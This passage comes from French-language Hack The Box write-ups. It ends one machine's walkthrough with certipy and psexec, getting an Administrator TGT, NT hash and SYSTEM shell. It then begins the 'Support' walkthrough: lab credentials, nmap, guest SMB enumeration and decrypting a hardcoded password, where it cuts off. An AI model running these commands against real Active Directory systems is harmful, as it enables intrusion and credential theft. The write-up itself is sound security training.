class="k">$(</span>net <span class="nb">time</span> -S 10.10.11.202 <span class="p">|</span> awk <span class="s1">&#39;{print $4}&#39;</span><span class="k">)</span><span class="s2">&#34;</span> zsh </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ date </span></span><span class="line"><span class="cl">Fri Sep <span class="m">12</span> 08:03:39 AM CEST <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ntpdate -q 10.10.11.202 </span></span><span class="line"><span class="cl">2025-09-12 08:03:44.141842 <span class="o">(</span>+0200<span class="o">)</span> -0.075273 +/- 0.010154 10.10.11.202 s1 no-leap </span></span></code></pre></td></tr></table> </div> </div><h3 id="getting-a-tgt-as-administrator">Getting a TGT as Administrator </h3><p>Avec le certificat généré, on obtient un <strong>TGT</strong> et le <strong>hash NT</strong> de l’Administrator :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ certipy auth -pfx administrator.pfx </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: administrator@sequel.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got TGT </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved credential cache to <span class="s1">&#39;administrator.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to retrieve NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator@sequel.htb&#39;</span>: aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee </span></span></code></pre></td></tr></table> </div> </div><h3 id="gaining-administrator-shell-psexec">Gaining Administrator Shell (psexec) </h3><p>En utilisant le TGT et l&rsquo;outil psexec.py, on obtient un shell en tant que <code>nt authority\system</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ <span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s2">&#34;administrator.ccache&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ psexec.py -k -no-pass sequel.htb/Administrator@dc.sequel.htb </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting shares on dc.sequel.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found writable share ADMIN$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Uploading file zjPAtFqg.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Opening SVCManager on dc.sequel.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Creating service cbfM on dc.sequel.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting service cbfM..... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.2746<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">1991.....91d7 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/support-htb/Sun, 07 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/support-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Support cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Support</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.174</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ldap : nvEfEK16^1aM4<span class="nv">$e7AclUf8x$tRWxPWO1</span>%lmz </span></span><span class="line"><span class="cl">support : Ironside47pleasure40Watchful </span></span></code></pre></td></tr></table> </div> </div><h2 id="system-info">System Info </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Windows Server <span class="m">2022</span> Build <span class="m">20348</span> x64 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.174 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-09-07 16:43:36Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: support.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open tcpwrapped syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: support.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">3269/tcp open tcpwrapped syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">5985/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49664/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49667/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49674/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49678/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49702/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="dumping-users-using-guest-account">Dumping Users using guest account </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.174 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows Server <span class="m">2022</span> Build <span class="m">20348</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:support.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> support.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.11.174 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> --rid-brute <span class="p">|</span> cut -d<span class="s1">&#39;:&#39;</span> -f2 <span class="p">|</span> cut -d<span class="s1">&#39;\&#39;</span> -f2 <span class="p">|</span> grep TypeUser <span class="p">|</span> cut -d<span class="s1">&#39; &#39;</span> -f1 &gt; users.txt </span></span><span class="line"><span class="cl">Administrator </span></span><span class="line"><span class="cl">Guest </span></span><span class="line"><span class="cl">krbtgt </span></span><span class="line"><span class="cl">DC$ </span></span><span class="line"><span class="cl">ldap </span></span><span class="line"><span class="cl">support </span></span><span class="line"><span class="cl">smith.rosario </span></span><span class="line"><span class="cl">hernandez.stanley </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="smb-share--support-tools">SMB Share : support-tools </h3><p>Grâce au compte <strong>guest</strong>, on obtient un accès sur le share smb <code>support-tools</code>, qui nous permet notamment de récupérer un fichier intéressant : <code>UserInfo.exe.zip</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.174 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> -M spider_plus </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows Server <span class="m">2022</span> Build <span class="m">20348</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:support.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> support.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Started module spidering_plus with the following options: </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> DOWNLOAD_FLAG: False </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> STATS_FLAG: True </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> EXCLUDE_FILTER: <span class="o">[</span><span class="s1">&#39;print$&#39;</span>, <span class="s1">&#39;ipc$&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> EXCLUDE_EXTS: <span class="o">[</span><span class="s1">&#39;ico&#39;</span>, <span class="s1">&#39;lnk&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> MAX_FILE_SIZE: <span class="m">50</span> KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC NETLOGON Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC support-tools READ support staff tools </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC SYSVOL Logon server share </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> Saved share-file metadata to <span class="s2">&#34;/root/.nxc/modules/nxc_spider_plus/10.10.11.174.json&#34;</span>. </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Shares: <span class="m">6</span> <span class="o">(</span>ADMIN$, C$, IPC$, NETLOGON, support-tools, SYSVOL<span class="o">)</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Readable Shares: <span class="m">2</span> <span class="o">(</span>IPC$, support-tools<span class="o">)</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Filtered Shares: <span class="m">1</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Total folders found: <span class="m">0</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Total files found: <span class="m">7</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size average: 13.96 MB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size min: 77.32 KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size max: 45.87 MB </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat /root/.nxc/modules/nxc_spider_plus/10.10.11.174.json </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;support-tools&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;7-ZipPortable_21.07.paf.exe&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:19&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:19&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:19&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;2.75 MB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;UserInfo.exe.zip&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:31&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:31&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:31&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;45.87 MB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;UserInfo.exe.zip&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-07-20 19:01:07&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-07-20 19:01:06&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-07-20 19:01:07&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;271 KB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;WiresharkPortable64_3.6.5.paf.exe&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:43&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:43&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:43&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;42.34 MB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;npp.8.4.1.portable.x64.zip&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:55&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:55&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:55&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;5.19 MB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;putty.exe&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:06&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:06&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:06&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;1.21 MB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;windirstat1_1_2_setup.exe&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:17&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:17&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:17&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;77.32 KB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="userinfoexezip--net-executable">UserInfo.exe.zip : .NET executable </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.174 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> --get-file <span class="se">\\</span>UserInfo.exe.zip UserInfo.exe.zip --share support-tools </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows Server <span class="m">2022</span> Build <span class="m">20348</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:support.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> support.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Copying <span class="s2">&#34;\UserInfo.exe.zip&#34;</span> to <span class="s2">&#34;UserInfo.exe.zip&#34;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> File <span class="s2">&#34;\UserInfo.exe.zip&#34;</span> was downloaded to <span class="s2">&#34;UserInfo.exe.zip&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ce zip contient un binaire cutom <strong>UserInfo.exe</strong>. En décompilant le binaire, on découvre une string ressemblant à un mot de passe chiffré ainsi qu&rsquo;une clé :</p> <ul> <li>&ldquo;0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E&rdquo;</li> <li>&ldquo;armando&rdquo;</li> </ul> <p>Une fonction <strong>getPassword</strong> semble déchiffrer cette string à l&rsquo;aide de la clé en effectuant une manipulation.</p> <p><img src="https://leopoldabgn.github.io/writeups/p/support-htb/image.png" width="1468" height="409" srcset="https://leopoldabgn.github.io/writeups/p/support-htb/image_hu_524637b0566fa3a3.png 480w, https://leopoldabgn.github.io/writeups/p/support-htb/image_hu_f9c590aeffa15cef.png 1024w" loading="lazy" alt="enc_password and protected key" class="gallery-image" data-flex-grow="358" data-flex-basis="861px" ></p> <p>Grâce à <strong>ChatGPT</strong>, j&rsquo;ai pu comprendre comment fonctionnait le code et il m&rsquo;a généré un code Python équivalent au code <strong>.NET</strong> ce qui m&rsquo;a permis de récupérer le mot de passe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">base64</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">enc_password</span> <span class="o">=</span> <span class="s2">&#34;0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">key</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;armando&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span 